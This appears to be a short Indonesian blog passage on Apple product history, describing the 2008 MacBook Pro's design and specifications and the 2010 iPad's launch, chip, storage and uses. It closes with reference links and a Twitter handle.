MacBook Pro diperkenalkan pada tahun 2008. Memiliki gaya iMac glass screen, air-style surface, dan tidak ada tombol trackpad. Menggunakan Intel Core 2 Duo processor 2.4GHz dan berjalan pada 2.53GHz dan 320 GB hard drive. Juga menyimpan hingga 4GB RAM.

iPad diluncurkan oleh Steve Jobs pada tahun 2010 untuk 'menjembatani kesenjangan antara laptop dan ponsel'. Diaktifkan oleh 1GHz chip A4 Apple 16GB ke 64GB flash penyimpanan dan bekerja dengan Wi-Fi dan 3G. Tablet layar sentuh ini dirancang untuk menjelajahi web, menonton film, membaca buku dan berbagi foto.
 


Referensi :
-http://yapono.wordpress.com/2008/06/07/steve-jobs-pendiri-microsoft
-http://www.klikunic.com/2010/02/produk-apple-dari-masa-ke-masa.html
http://tekno.kompas.com/read/2011/06/14/14322124/Kisah.Sukses.Steve.Jobs.Dibuat.Komik


Follow As Twitter @HabySoekarno